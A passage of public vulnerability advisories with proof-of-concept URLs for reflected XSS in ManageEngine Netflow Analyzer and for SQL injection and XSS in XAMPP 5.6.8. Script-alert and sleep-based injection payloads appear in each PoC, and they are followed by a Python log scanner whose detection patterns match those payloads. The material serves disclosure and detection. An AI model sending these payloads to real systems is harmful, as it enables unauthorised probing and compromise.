An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in /netflow/jspui/userManagementForm.jsp via these GET parameters: authMeth, passWord, pwd1, and userName.
2. Proof of Concept
http://localhost:8080/netflow/jspui/userManagementForm.jsp?moveLR=&moveRL=&moveLRIP=&moveRLIP=&moveLRBuss=&moveRLBuss=&addField=&authMeth=fgcuh%3e%3cscript%3ealert(1)%3c%2fscript%3eyxcpve1able&createRadUser=false&radSet=&userName=qqq&radiusUser=Authenticate+locally&pwd1=qqqqqq&passWord=qqqqqq&priv=Guest
Parameters: authMeth, passWord, pwd1 and userName
3. Solution:
Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8929
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/selectDevice.jsp file in these GET parameters: param and rtype.
2. Proof of Concept
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=collopts&param=g3oxp%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C!--q5uad
Parameters: param and rtype
3. Solution:
Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: SQL injection in XAMPP 5.6.8 (and previous)
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.8
# Tested on: All
# CVE : CVE-2019-8923
# Category: webapps
1. Description
XAMPP through 5.6.8 allows SQL injection via the cds-fpdf.php jahr parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8.2 (and previous).
2. Proof of Concept
http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29
3. Solution:
The product is discontinued. Update to the latest version.
Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
-->
<!--
# Exploit Title: Cross Site Scripting in XAMPP 5.6.8 (and previous)
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.8
# Tested on: All
# CVE : CVE-2019-8924
# Category: webapps
1. Description
XAMPP through 5.6.8 allows XSS via the cds-fpdf.php interpret or titel parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8.2 (and previous).
2. Proof of Concept
First request (the input characters are not filtered): http://X.X.X.X/xampp/cds.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984
or: http://localhost/xampp/cds.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984
Second request (the XSS attack): http://X.X.X.X/xampp/cds-fpdf.php
http://localhost/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984
http://localhost/xampp/cds-fpdf.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984
When cds-fpdf.php is loaded, the characters are not filtered: <b><script>alert("XSS")</script></b></td><td class=tabval>
cds.php filters it: <td class=tabval><b><script>alert("XSS"</script></b></td><td class=tabval>
3. Solution:
The product is discontinued. Update to the latest version.
Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
-->
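For the Netflow Analyzer XSS advisories and the XAMPP SQL injection and XSS advisories above, here is an added detection example (not code from any of the advisories or products): a small access-log scanner that fully percent-decodes each query parameter and flags the reflected-script and time-based SQL injection patterns those proofs of concept use. The log lines are constructed from the PoC URLs on this page, with made-up client addresses and timestamps; the fourth line is a benign request and must not be flagged.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines modelled on the PoC requests above; the last one
# is a legitimate request and serves as the negative case.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Feb/2019:14:55:01 +0100] "GET /netflow/jspui/popup1.jsp?selSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true HTTP/1.1" 200 512
10.0.0.5 - - [18/Feb/2019:14:55:07 +0100] "GET /netflow/jspui/selectDevice.jsp?rtype=collopts&param=g3oxp%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C!--q5uad HTTP/1.1" 200 733
10.0.0.9 - - [18/Feb/2019:14:56:12 +0100] "GET /xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29 HTTP/1.1" 200 2048
10.0.0.7 - - [18/Feb/2019:14:57:30 +0100] "GET /xampp/cds-fpdf.php?interpret=Queen&titel=The+Works&jahr=1984 HTTP/1.1" 200 2048
"""

REQUEST_LINE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

# Signatures for the two bug classes reported above: reflected HTML/script
# injection and time-based blind SQL injection. They are applied to the fully
# decoded value, so %3c, %3C and a literal '<' are all treated alike.
RULES = [
    ("xss", re.compile(r"<\s*/?\s*(script|iframe)\b|javascript:|\bon[a-z]+\s*=", re.I)),
    ("sqli-time", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
]


def fully_decode(value: str) -> str:
    """Percent-decode repeatedly so double-encoded payloads do not slip past."""
    while True:
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded


def scan_log(log_text: str) -> list[tuple[str, str, str, str]]:
    """Return (client, path, parameter, rule) for every suspicious query parameter."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        client = line.split(" ", 1)[0]
        parts = urlsplit(match.group("target"))
        # parse_qsl already decodes one layer and turns '+' into a space
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(raw)
            for rule, pattern in RULES:
                if pattern.search(value):
                    findings.append((client, parts.path, name, rule))
                    break  # one finding per parameter is enough for triage
    return findings


if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```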